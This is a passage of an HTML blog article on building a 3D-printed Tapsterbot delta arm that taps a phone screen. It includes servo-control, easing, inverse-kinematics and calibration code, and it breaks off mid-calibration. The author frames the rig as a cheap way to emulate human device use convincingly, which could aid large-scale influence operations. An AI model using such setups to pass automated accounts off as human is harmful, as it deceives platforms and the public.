&lt;p&gt;This article details my effort to emulate human-like operation of a device convincingly and affordably, rather than just simulating application-level activity. Hiring real humans for such tasks is almost certainly prohibitively expensive (unless you’re &lt;a href=&quot;https://journals.sagepub.com/doi/full/10.1177/20563051231224713&quot;&gt;Saudi Arabia&lt;/a&gt;), so affordable orchestration of human-like activity could facilitate large-scale influence operations, or efforts to counter disinformation, without the financial strain of hiring content creators.&lt;/p&gt;
&lt;h2&gt;The Tapsterbot: Components and Setup&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/tapsterbot/tapsterbot&quot;&gt;Tapsterbot&lt;/a&gt; is a 3D-printable delta arm developed by Jason Huggins, the creator of Selenium. His current venture, &lt;a href=&quot;http://Tapster.io&quot;&gt;Tapster.io&lt;/a&gt;, is, as I understand it, a robotics company working on more sophisticated delta arms and other forms of human-like manipulation for app testing, and is definitely worth checking out!&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://github.com/tapsterbot/tapsterbot&quot;&gt;Tapsterbot&lt;/a&gt; project’s GitHub page provides the 3D printing files and a Bill of Materials (BOM) needed to build a delta arm for approximately £70 (assuming you have a printer), along with the software required to control it.&lt;/p&gt;
&lt;p&gt;I won’t go into much detail, as that would repeat what is already available on GitHub, but here are some extra resources I relied on to build the delta arm: &lt;a href=&quot;https://bitbeam.org/tag/tapsterbot/&quot;&gt;1&lt;/a&gt; &lt;a href=&quot;https://www.instructables.com/Tapsterbot-20-Arm-Assembly/&quot;&gt;2&lt;/a&gt; &lt;a href=&quot;https://www.youtube.com/channel/UCIPouO52Yc5aeYZzntVZFJA&quot;&gt;3&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The key components of the Tapsterbot include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Motors&lt;/strong&gt;: Three Hitec HS-311 servo motors, combined with some advanced trigonometric and kinematic mathematics that I don’t fully grasp, allow the delta arm to move effortlessly through three-dimensional space.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Arduino Microcontroller&lt;/strong&gt;: The Arduino controls the motors based on input commands, translating them into physical movements of the delta arm.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;3D Printed Delta Arm&lt;/strong&gt;: The core structure of the Tapsterbot consists of a top plate suspended above a bottom plate, with an arm made of rods and magnets. A stylus is then inserted into the delta arm ‘hand’.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 405px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/e5c7810986d3e49a7b45052f5cc005b5/1d180/delta_arm.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 150%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,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&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Delta Arm&quot;
        title=&quot;Delta Arm&quot;
        src=&quot;/static/e5c7810986d3e49a7b45052f5cc005b5/1d180/delta_arm.png&quot;
        srcset=&quot;/static/e5c7810986d3e49a7b45052f5cc005b5/12f09/delta_arm.png 148w,
/static/e5c7810986d3e49a7b45052f5cc005b5/e4a3f/delta_arm.png 295w,
/static/e5c7810986d3e49a7b45052f5cc005b5/1d180/delta_arm.png 405w&quot;
        sizes=&quot;(max-width: 405px) 100vw, 405px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;To control the Tapsterbot’s delta arm, commands must be sent to the Arduino, which then translates them into motor movements. This is done using a Node.js server. Its main ‘go’ function takes a user-supplied set of coordinates entered in the terminal. Unless the ease type is ‘none’, it generates a series of eased intermediate points towards that target. It then schedules each point to be passed to ‘moveServosTo’, which handles the complicated maths and moves the servos.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;javascript&quot;&gt;&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;&lt;span class=&quot;token function-variable function&quot;&gt;go&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;x&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; z&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; easeType&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; pointB &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; z&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;easeType &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;none&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;moveServosTo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;pointB&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; pointB&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; pointB&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// Ensures that it doesn&apos;t move twice&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;easeType&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    easeType &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; defaultEaseType&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// If no easeType is specified, go with default (specified in config.js)&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// motion.move(current, pointB, steps, easeType, delay);&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; points &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; motion&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getPoints&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;current&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; pointB&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; steps&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; easeType&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; i &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; i &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; points&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; i&lt;span class=&quot;token operator&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;setTimeout&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;point&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token function&quot;&gt;moveServosTo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;point&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; point&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; point&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; i &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; delay&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; points&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
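&lt;p&gt;The motion.getPoints helper is not shown above. The sketch below is a rough, hypothetical stand-in for what the steps and easeType parameters are presumably doing. It generates intermediate points between the current and target positions, with an easing curve controlling how far along the path each step lands. The function name getPointsSketch and the two easing curves are assumptions, not Tapsterbot’s actual implementation.&lt;/p&gt;

```javascript
// Easing curves map normalised time t (from 0 to 1) to progress along the path.
const EASINGS = {
  linear: (t) => t,
  // Accelerate during the first half, decelerate during the second half.
  easeInOutQuad: (t) => (t >= 0.5 ? 1 - Math.pow(-2 * t + 2, 2) / 2 : 2 * t * t),
};

// Hypothetical stand-in for motion.getPoints: returns steps + 1 points from
// `from` to `to` (both [x, y, z] arrays), including both endpoints.
function getPointsSketch(from, to, steps, easeType = "linear") {
  const ease = EASINGS[easeType];
  if (!ease) throw new Error(`Unknown easeType: ${easeType}`);
  return Array.from({ length: steps + 1 }, (_, i) => {
    const progress = ease(i / steps);
    return from.map((start, axis) => start + (to[axis] - start) * progress);
  });
}

const path = getPointsSketch([0, 0, -150], [20, -10, -160], 4, "easeInOutQuad");
console.log(path);
// first point [0, 0, -150], middle point [10, -5, -155], last point [20, -10, -160]
```

&lt;p&gt;In the ‘go’ function above, each such point is then scheduled with setTimeout at i * delay milliseconds and passed to moveServosTo. An ease-in-out curve therefore makes the stylus start and stop gently rather than jerking at constant speed.&lt;/p&gt;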
&lt;p&gt;The moveServosTo function calculates the angles for three servos to reach a specified position (x, y, z) by first reflecting and rotating the input coordinates, then applying inverse kinematics to determine the appropriate servo angles. It maps these angles to the specific input-output range of each servo based on their configuration settings, commands the servos to move to these positions, and logs the calculated angles for monitoring purposes.&lt;/p&gt;
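&lt;p&gt;The inverse-kinematics step can be illustrated with the widely used closed-form solution for a rotary delta robot. One arm is solved in its own vertical plane, and the other two reuse the same calculation after the target is rotated by 120 degrees each way. This is a minimal sketch under stated assumptions rather than Tapsterbot’s own code. It omits the reflection and per-servo range mapping described above, assumes the effector works below the base (negative z), returns angles in degrees, and uses illustrative dimensions (e, f, re, rf) that are not measurements of a Tapsterbot.&lt;/p&gt;

```javascript
// Closed-form inverse kinematics for a rotary delta robot (sketch).
// dims: f = base triangle side, e = effector triangle side,
//       rf = upper (servo) arm length, re = lower (parallelogram) arm length.
const SQRT3 = Math.sqrt(3);
const TAN30 = 1 / SQRT3;
const SIN120 = SQRT3 / 2;
const COS120 = -0.5;

// Solve one arm in its YZ plane; returns the servo angle in degrees, or null if unreachable.
function armAngle(x0, y0, z0, { e, f, re, rf }) {
  const y1 = -0.5 * TAN30 * f; // servo pivot, offset from the base centre
  const yE = y0 - 0.5 * TAN30 * e; // effector joint, offset from the effector centre
  // The elbow lies on the line z = a + b * y where the two constraints intersect.
  const a = (x0 * x0 + yE * yE + z0 * z0 + rf * rf - re * re - y1 * y1) / (2 * z0);
  const b = (y1 - yE) / z0;
  const d = -(a + b * y1) * (a + b * y1) + rf * rf * (b * b + 1);
  if (!(d >= 0)) return null; // negative (or NaN) discriminant: point out of reach
  const yj = (y1 - a * b - Math.sqrt(d)) / (b * b + 1); // choose the outer elbow position
  const zj = a + b * yj;
  return (Math.atan(-zj / (y1 - yj)) * 180) / Math.PI + (yj > y1 ? 180 : 0);
}

// Angles for all three servos; the target is rotated into arm 2 and arm 3 frames.
function inverseKinematics(x, y, z, dims) {
  const t1 = armAngle(x, y, z, dims);
  const t2 = armAngle(x * COS120 + y * SIN120, y * COS120 - x * SIN120, z, dims);
  const t3 = armAngle(x * COS120 - y * SIN120, y * COS120 + x * SIN120, z, dims);
  return t1 === null || t2 === null || t3 === null ? null : [t1, t2, t3];
}

const DIMS = { e: 115, f: 457.3, re: 232, rf: 112 }; // illustrative values only
console.log(inverseKinematics(20, -15, -250, DIMS));
```

&lt;p&gt;Solving a single arm and rotating the target keeps the maths to one plane per servo. The resulting angles would still need mapping to each servo’s own range, as the Tapsterbot code does.&lt;/p&gt;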
&lt;h2&gt;Mapping UI elements to delta arm position&lt;/h2&gt;
&lt;p&gt;One &lt;a href=&quot;https://medium.com/devs-foodit/iphone-automation-with-a-one-fingered-robot-a2936c840285&quot;&gt;article&lt;/a&gt; was particularly useful in helping map UI elements to the delta arm’s position. It recommended using a mobile app to display the coordinates of a finger or stylus on the screen. Building such an app was relatively simple: mine printed the coordinates on an Android device whenever a touch event was detected.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/454b6cfb0c5a89ca70ca19521870bcd0/84a90/codeblock.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 71.62162162162163%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAABJ0AAASdAHeZh94AAACQ0lEQVQ4y41TS24TQRQcS4CQ59Pz//bYxh+FLSw4AEcAgYRYILFlwY4VIIKwo3CCsOIKnIEFR0BBXCAisEsUW/4U9RrbhDBItPT0eub11NSrem2pOIObd1CVHVwvK/TzAro/Qr/Xxw73padQKB++CnDpioUnj1/i3dMjjB98xu7dQ7y5/wVvH33F7p1DfPrwA5brOIiiGH4YwlUKrufxYw+K4fC5zbrtOvBchctXCfjwNQ7uzTC+fYTnN47x4uYxXt36jmc73/Dx/SkBCRDnJaIsR5xk0H6AbqWhdY1uR5iXJvI8g2VZ2NubQNYKSzQty7bJMPTZosZgOMJoOMRoNMJgMDBZaw2PP5UQwPF4bD5cLOZYrVZ/heWwJZ+sKsNKM1dI0xSauUOGJdkVRWH2cnZ/f98Azuf/AHRdF2EYENQ3+kk4fLdh5a73ITVutVqYTCaNgEYGA8jDSaFRRClSz0dGV0syzrOMuuWGbRzH5ofS8nnA82sDaomDgQqhvRgVjRn2ehh0uwiDX6wlFN1uApzNZphOp1gul78Zii6KbSV+aJhkZJWQlUcQaVXq5gyfLwI2tiyHA+rTJbO6rrdGJOs2RUOJJsDGlmWwPd4EL0ygosQYYsswS9j2fzPcuixtKZrg0AzleghkjBwXgexpknnHWkBNmwHxJ2C7bRtmaVWj5l2+lmbo0eGaOQqoqwT1jdLEjM1msC+2vL0pMh4FjTBXjMNcriPnMIs5GeuSC9ZFgs1gn5yc0uEZzs6mJkvM5wv8BITqY6Rx2gW2AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Code Block&quot;
        title=&quot;Code Block&quot;
        src=&quot;/static/454b6cfb0c5a89ca70ca19521870bcd0/fcda8/codeblock.png&quot;
        srcset=&quot;/static/454b6cfb0c5a89ca70ca19521870bcd0/12f09/codeblock.png 148w,
/static/454b6cfb0c5a89ca70ca19521870bcd0/e4a3f/codeblock.png 295w,
/static/454b6cfb0c5a89ca70ca19521870bcd0/fcda8/codeblock.png 590w,
/static/454b6cfb0c5a89ca70ca19521870bcd0/efc66/codeblock.png 885w,
/static/454b6cfb0c5a89ca70ca19521870bcd0/84a90/codeblock.png 982w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The article describes a calibration routine that involves collecting two reference points on the screen. It assumes the stylus touches the screen at a consistent height on the z-axis (up and down relative to the phone screen). It then explains how these two points can be used to determine the delta arm position for every other coordinate on the screen through two-dimensional transformations.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/2d02242b8e59eec613daca8c6dfaa0ad/5aae9/matrix.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAABJ0AAASdAHeZh94AAABxklEQVQoz51T23KbMBD1//9T+thJJrFn2j503PiGAxiEQBckdOHWI2S3TZrJQ86MYFnt2V2dFat5nqdxmqYRxrggGsE9jsPQe++NtdM8zf9hhb2XNK1IxlhzqSpaU3gZb7x3nTFCsqf1/fP+WYgmlFnqAFeycy45nynNKSUFIYRS1FNadZ3mgg3j9Pj0dfvrJ2d0Ib+qH8hplrKmPCeHS1kwzr2zutPWGaW1836zeUiSI3aTJEnzvCjzuy933vdXcpZmhOSEFJeyrOvQHkcK761BFrXePJzOR0oL57wxxveeCx6lCeTD6QQy2k7LoiQVVGrbVmvNRIOgx/X9drd9v218S4VgCYX6wWutnEVC55cFctPUJSmHYXhHbSyEGWNNXMZ0XWetjRaMvu+RCE6lVPSjqZgrkFG3vqFBobpmmNvNgFlVFWxKqZQScsCAIlfyp3ElTzd8EDr9g7/kPy6cRAiBG3I47qUUQgqcE62m6Qva1kq/KfOqbWiT5Zls5fcf33BTKa1wYs7Zbr+jNJz5zbTC3YZgagEkHUb8Cj1aCJPyYV7WOiQNb2tjDJ4QHFlWcC3puVjQLoAHtlwgBLbCfoyJguMJ8m98jF7G+9AlWQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Matrix&quot;
        title=&quot;Matrix&quot;
        src=&quot;/static/2d02242b8e59eec613daca8c6dfaa0ad/fcda8/matrix.png&quot;
        srcset=&quot;/static/2d02242b8e59eec613daca8c6dfaa0ad/12f09/matrix.png 148w,
/static/2d02242b8e59eec613daca8c6dfaa0ad/e4a3f/matrix.png 295w,
/static/2d02242b8e59eec613daca8c6dfaa0ad/fcda8/matrix.png 590w,
/static/2d02242b8e59eec613daca8c6dfaa0ad/5aae9/matrix.png 610w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
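&lt;p&gt;As a rough illustration of the two-point idea, the sketch below models the screen-to-arm mapping as a 2D similarity transform (uniform scale, rotation and translation) and solves it from two calibration pairs using Python’s complex numbers. This is an assumption about how such a routine could work, not the referenced article’s code; &lt;code&gt;fit_two_point&lt;/code&gt; and the example coordinates are hypothetical.&lt;/p&gt;

```python
# Hypothetical sketch: two-point calibration as a 2D similarity transform.
# Points are encoded as complex numbers (x + yj), so the mapping is
# arm = m * screen + c, where m encodes scale plus rotation and c is a translation.

Point = tuple[float, float]


def fit_two_point(screen_a: Point, screen_b: Point, arm_a: Point, arm_b: Point):
    """Return a function mapping screen (x, y) to arm (x, y).

    Assumes the stylus height (z) is constant, so the problem is planar.
    """
    sa, sb = complex(*screen_a), complex(*screen_b)
    aa, ab = complex(*arm_a), complex(*arm_b)
    if sa == sb:
        raise ValueError("calibration points must be distinct")
    m = (ab - aa) / (sb - sa)  # scale and rotation
    c = aa - m * sa            # translation

    def screen_to_arm(x: float, y: float) -> Point:
        z = m * complex(x, y) + c
        return (z.real, z.imag)

    return screen_to_arm


# Example with hypothetical values: screen pixels in, arm millimetres out.
to_arm = fit_two_point((100, 200), (980, 2100), (-25.0, -50.0), (25.0, 55.0))
print(to_arm(540, 1150))
```

&lt;p&gt;A similarity transform cannot represent shear, non-uniform scaling or non-linear distortion, so any such imperfection in the physical build tends to show up as error that grows with distance from the two calibration points, which is one plausible source of inaccuracy near the screen edges.&lt;/p&gt;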
&lt;p&gt;This approach didn’t work for me. I’m uncertain whether the issue was due to inconsistencies in my Tapsterbot build, such as slightly bent or unevenly sized arms, or whether the mathematics involved were too complex to be reduced to a single-plane calculation. Regardless, I encountered inaccuracies, particularly at the edges of the screen, which prevented Appium instructions from being translated into the correct delta arm positions.&lt;/p&gt;
&lt;p&gt;The next step in addressing these challenges involved a more intricate calibration process. Initially, the arm coordinates of the screen’s four corners were determined manually by moving the delta arm to each extremity.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
